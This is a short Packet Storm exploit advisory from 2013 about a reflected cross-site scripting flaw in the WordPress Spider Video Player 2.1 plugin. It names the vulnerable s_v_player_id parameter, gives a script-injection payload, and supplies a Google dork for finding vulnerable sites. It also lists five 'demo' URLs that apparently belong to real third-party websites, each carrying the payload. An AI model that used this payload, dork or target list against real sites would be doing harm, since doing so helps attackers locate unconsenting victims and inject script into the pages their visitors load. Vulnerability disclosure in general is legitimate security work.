WordPress Spider Video Player 2.1 Cross Site Scripting

2013-12-09T00:00:00
ID PACKETSTORM:124353
Type packetstorm
Reporter Ashiyane Digital Security Team
Modified 2013-12-09T00:00:00

Description

                                        
                                            `====================================================================  
# Exploit Title : WordPress Spider Video Player 2.1 Cross site scripting  
Vulnerability  
  
# Exploit Author : Ashiyane Digital Security Team  
  
# Vendor Homepage : http://web-dorado.com/  
  
# Google Dork : inurl:wp-content/plugins/player/settings.php  
  
# Date: 2013-12-09  
  
# Tested on: Windows 7 & Linux  
  
# discovered by : ACC3SS  
------------------------------------------------  
#  
# Exploit : Cross site scripting  
#  
# Location :  
localhost/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=[xss]  
#  
# Method : Get  
#  
# Script For Test : "/><script>alert(1);</script>  
#  
------------------------------------------------  
#  
# Demo:  
#  
#  
http://www.adethefade.com/wp-content/plugins//player/settings.php?playlist=&theme=&s_v_player_id=  
"/><script>alert(1);</script>  
#  
#  
http://www.beton-mobile-tp.fr/blog-beton/wp-content/plugins//player/settings.php?playlist=&theme=&s_v_player_id=  
"/><script>alert(1);</script>  
#  
#  
www.sonorapalaciosjr.cl/demos/wordpress/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=  
"/><script>alert(1);</script>  
#  
#  
#  
http://www.extravagancelingerie.com.br/site/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=  
"/><script>alert(1);</script>  
#  
#  
http://www.cintro.com.br/wordpress/wp-content/plugins/player/settings.php?playlist=&theme=&s_v_player_id=  
"/><script>alert(1);</script>  
#  
######################  
`